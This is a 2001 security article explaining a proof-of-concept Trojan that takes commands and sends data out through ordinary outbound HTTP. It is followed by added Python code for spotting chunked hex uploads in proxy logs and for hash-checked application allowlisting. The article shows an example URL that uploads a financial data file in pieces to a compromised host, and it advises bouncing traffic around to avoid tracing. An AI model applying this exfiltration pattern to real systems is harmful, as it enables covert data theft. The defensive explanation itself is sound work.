Security Feature

No Desktop is an Island

November 12, 2001
By Michael J. DeMaria

Online Only: How Trojan Viruses Work -- A New Wrinkle

Traditionally, Trojan programs wait for incoming connections to the compromised machine. Because the Trojan is just a regular program, it has full access to whatever a normal program can do: It can read files, delete files, access the network, upload files and so forth. You rely on an antivirus program to find and disinfect a Trojan, and use a firewall to control and contain it. On a corporate firewall, you block all the unnecessary ports (both in and out), and limit the destination of incoming connections.

On a desktop machine, you can set it up so all incoming connections are dropped. This will defeat most inbound Trojan programs, such as BackOrifice or Sub 7. But now there's a new method available that gets around port blocking and intrusion detection: Make an outbound connection to an already compromised machine using legitimate network traffic.

The idea of an outbound connection with legitimate traffic is something I came up with over the past year. I don't have any experience with network coding or Winsock programming, so for this project I was assisted by Ifeanyi Echeruo in developing a Trojan program we dubbed "Sheepshank." It took Echeruo, a graduate student in the Engineering College at Syracuse University, less than three hours to get a working prototype of Sheepshank up and running. When run, this program makes an HTTP GET request to a Web server, just like Netscape Communicator or Microsoft Internet Explorer would do. The Web server returns a Web page, which has keywords in it. For example, the page may say "<html><body>clearwallpaper</body></html>." The Trojan ignores the parts that it doesn't understand, and sees the keyword clearwallpaper. Source code, precompiled binaries and example usage are available at nwc.syr.edu/~mdemaria/sheepshank.

While clearing the wallpaper may sound trivial, there are many other things you can do. For example, you can upload the contents of c:\quicken\myfinancialdata in segments by using "http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=AAD3B4351404EE" and just have a CGI script on the compromised machine piece the chunks together. If a network analyzer is used, it all looks like normal HTTP and HTML traffic. And if you select the keywords carefully and change some of the command strings, intrusion-detection systems would have a very difficult time stopping it. Because this is all valid Web traffic, there's very little chance you'll want to block outbound Port 80. This technique is more traceable than most Trojans, because it requires an already compromised machine. A savvy intruder will have the messages bounce around multiple locations on the Internet to avoid being traced.
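One defensive counterpart to the pattern just described, as an added example that is not part of the article or the Sheepshank project: detection logic run over constructed proxy log lines. From the network side the chunked upload looks like one client repeatedly sending hex-only query values to the same script, and that is what this code flags; the log format, the thresholds and the sample lines are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log: "<epoch> <client> <method> <url> <status>".
# The first four lines mimic the chunked upload described in the article.
SAMPLE_LOG = """\
1005548400 10.1.2.3 GET http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=AAD3B4351404EE 200
1005548401 10.1.2.3 GET http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=0C1F2E3D4C5B6A79 200
1005548402 10.1.2.3 GET http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=DEADBEEF00112233 200
1005548403 10.1.2.3 GET http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=4455667788990011 200
1005548410 10.1.2.3 GET http://www.example.com/index.html 200
1005548411 10.1.2.9 GET http://www.example.com/search?q=firewall+rules 200
"""

HEX_CHUNK = re.compile(r"^[0-9A-Fa-f]{8,}$")  # chunk values are pure hex
MIN_REQUESTS = 3                               # repeated chunks trigger a finding

def parse_line(line):
    """Split one log line into its fields and decode the URL."""
    ts, client, _method, url, _status = line.split()
    u = urlsplit(url)
    return {"ts": int(ts), "client": client, "host": u.hostname,
            "path": u.path, "query": parse_qs(u.query)}

def hex_param_bytes(query):
    """Decoded byte count of every hex-looking parameter value."""
    return sum(len(v) // 2 for vals in query.values()
               for v in vals if HEX_CHUNK.match(v))

def find_chunked_uploads(log_text):
    """Group hex-carrying requests by (client, host, path) and report
    groups with MIN_REQUESTS or more, with bytes moved and time span."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            nbytes = hex_param_bytes(rec["query"])
            if nbytes:
                key = (rec["client"], rec["host"], rec["path"])
                groups[key].append((rec["ts"], nbytes))
    findings = []
    for (client, host, path), hits in sorted(groups.items()):
        if len(hits) >= MIN_REQUESTS:
            findings.append({"client": client, "host": host, "path": path,
                             "requests": len(hits),
                             "bytes_out": sum(n for _, n in hits),
                             "seconds": hits[-1][0] - hits[0][0]})
    return findings
```

A real deployment would also score base64-looking values and beaconing intervals, since an intruder who changes the command strings, as the article notes, will not keep the hex encoding for long.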

What's the solution? You must go beyond port blocking and intrusion detection, and that next step is application control: specify which programs on each machine are allowed to access the network. Furthermore, be sure there's a way to check application integrity; otherwise it's possible to bundle a Trojan onto an approved application. Many vendors accomplish this by computing an MD5 hash of the executable -- if the executable is modified, the hashes won't match up.
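The application-control check the article recommends, as an added example that is not the article's or any vendor's code: a per-machine allowlist of programs permitted to use the network, each pinned to a digest of its executable. The article mentions vendors using MD5; this example uses SHA-256 because MD5 collisions are practical today. The file paths and contents are constructed.

```python
import hashlib
import os
import tempfile

def digest_file(path):
    """SHA-256 of the executable's bytes, read in 64 KiB blocks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()

def enroll(allowlist, path):
    """Approve a program for network access, pinning its current digest."""
    allowlist[os.path.abspath(path)] = digest_file(path)

def network_allowed(allowlist, path):
    """Decide whether the program at `path` may open a network connection.
    Returns (allowed, reason); unknown or modified binaries are denied."""
    expected = allowlist.get(os.path.abspath(path))
    if expected is None:
        return False, "not on allowlist"
    if digest_file(path) != expected:
        return False, "executable modified since approval"
    return True, "ok"

def demo():
    """Approve a program, then alter it the way bundling a Trojan would.
    Returns the three decisions: before tampering, after, and unknown."""
    allowlist = {}
    with tempfile.TemporaryDirectory() as d:
        browser = os.path.join(d, "browser.exe")   # constructed paths
        other = os.path.join(d, "unknown.exe")
        with open(browser, "wb") as f:
            f.write(b"MZ constructed browser image")   # constructed bytes
        with open(other, "wb") as f:
            f.write(b"MZ constructed unapproved program")
        enroll(allowlist, browser)
        before = network_allowed(allowlist, browser)
        with open(browser, "ab") as f:
            f.write(b"\x00extra code appended")         # simulate tampering
        after = network_allowed(allowlist, browser)
        unknown = network_allowed(allowlist, other)
    return before, after, unknown
```

The digest must be recomputed at the moment of the connection attempt, not cached from enrollment, or a modified binary passes on its old approval.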
